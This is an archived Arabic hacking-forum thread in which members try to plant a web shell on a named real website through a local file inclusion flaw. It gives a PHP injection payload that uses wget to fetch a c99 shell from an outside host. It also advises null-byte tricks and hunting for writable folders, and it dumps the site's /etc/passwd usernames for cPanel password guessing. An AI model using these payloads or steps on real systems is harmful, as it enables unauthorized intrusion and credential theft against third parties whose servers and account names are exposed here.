:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   استفسار في حقن الشل بـ LFI (http://www.vbspiders.com/vb/t62673.html)

Sn4Ke'z 06-04-2012 07:04 PM

استفسار في حقن الشل بـ LFI
 
السلام عليكم اعذروني على كثرة استفساراتي
طبقت على هذا الموقع http://www.shorebreak.be/frontend/js...c/self/environ
و تم قراءة proc/self/environ
لكن عند وضع
<?exec('wget http://www.sh3ll.org/c99.txt -O c99.php');?>
بالتمبر داتا لا يعمل ممكن الطريقة السليمة

Sn4Ke'z 06-05-2012 12:29 AM

رد: استفسار في حقن الشل بـ LFI
 
ممكن مساعدة ؟

vpn_31 06-05-2012 12:51 AM

رد: استفسار في حقن الشل بـ LFI
 
Something went wrong
هناك خطئ ما....
لم يتم الأستغلال بنجاح
<html><body>Something went wrong.</body></html>
http://www.shorebreak.be/frontend/js...c/self/environ
ضيف
علامة %00
ليصبح
http://www.shorebreak.be/frontend/js...elf/environ%00

Sn4Ke'z 06-05-2012 12:57 AM

رد: استفسار في حقن الشل بـ LFI
 
نعم أخي تم عمل ذلك فقط نسيتلم أضع بالموضوع و كما ذكرت سابقا تم قراءة المجلد بنجاح
المشكل هي بحقن الشل أما بخصوص القراءة كل شيء تم قراءته

fantome195 06-05-2012 01:20 AM

رد: استفسار في حقن الشل بـ LFI
 
السلام عليكم
ياخي لازم تعود للموقع وتبحت عن sql
التي عن طريقها تقدر تحقن شيل بعدها بتقراه عن exploit LFI
هذا شرح أتمنى انويساعدك لي رجعة ان شاء الله
http://www.youtube.com/watch?v=7gKdT2Aa0UM

Sn4Ke'z 06-05-2012 02:31 AM

رد: استفسار في حقن الشل بـ LFI
 
بارك الله فيك ع الاجابة لكن الفيديو جودته رديئة أظن ..
المهم فقط حقنت هذا الكود بالتمبر داتا
<?exec('wget http://www.sh3ll.org/c99.txt -O c99.php');?>
لكن عند وضع اسم الشل وراء رابط الموقع أو مكان اسم الملف المصاب لا أجده
لذلك ممكن الطريقة الصحيحة و تقولو لي في اي شيء أخطأت أو ممكن تجربو انتم بطريقتكم على هذا الموقع و بعذها أطلعووني من فظلكم

Sn4Ke'z 06-05-2012 02:35 AM

رد: استفسار في حقن الشل بـ LFI
 
ممكن شباب أنتم ترفعو الشل بالتمبر داتا على الموقع و تقولو لي الطريقة فقط و فيما أخطأت ؟

fantome195 06-07-2012 06:02 PM

رد: استفسار في حقن الشل بـ LFI
 
السلام عليكم
يا خي يجب أن تبحت عن فولدر لديه التصريح 777
متلا فولدر الصور وتحقن شيلك فيه بعدها مبروك عليك
+++ اذا وجدت sql exploit
تأكد من Magic quotes>>> avtive or no
لاربما هي التي تمنع حقن الشيل

fantome195 06-07-2012 10:51 PM

رد: استفسار في حقن الشل بـ LFI
 
السلام عليكم
يا اخي جربت العديد من الطرق والحيل وما زبط معي
لي عودة انشاء االله
على فكرة تم قرائة
http://www.shorebreak.be/frontend/js...etc/passwdّ%00

fantome195 06-08-2012 12:06 AM

رد: استفسار في حقن الشل بـ LFI
 
السلام عليكم
وجدت طريقة لا ربما تساعد
http://www.vbspiders.com/vb/t62730.html
حمل الأدوات اليوزرات الخاصة بالسرفر الهدف
http://shorebreak.be/frontend/js.php.../etc/passwd%00

root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
bacula
sshd
telnetd-ssl
bind
apache
diradmin
mysql
webapps
ftp
majordomo
dovecot
admin
snmp
webfizzbe
eduard
hysca
firmasol
dalleine
pannebaal
didis
gooddog
simonhelli
marenostru
tekoopgevr
stevdobb
sofie
issera
azoo
bbo
cgglargo
zeepark
fon
marrannes
avifauna
dekelle
kruispunt
anseeuw
goudtkpgvr
orachat
steven
lukanseeuw
anseeuwarc
ddlight
hetmaantje
kuoni
shorebreak
spelinzich
poyo
forkdemo
speelwijze
lien
dokterstij
kapiteinor
surfschool
center
felix
cynthia
ستضعهم في برنامج تخمين الس بانل وحمل وردليت كبيرة عشان تقدر تجد باس أحد اليوزرات ومبروك عليك

SuperNoia 06-08-2012 01:30 AM

رد: استفسار في حقن الشل بـ LFI
 
Yes fantome195, When you can not host the shell, you can use my tutorial to find passwords from cpanel.

Hugs !

fantome195 06-09-2012 12:00 AM

رد: استفسار في حقن الشل بـ LFI
 
please can you give you the link ot tut


الساعة الآن 07:25 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0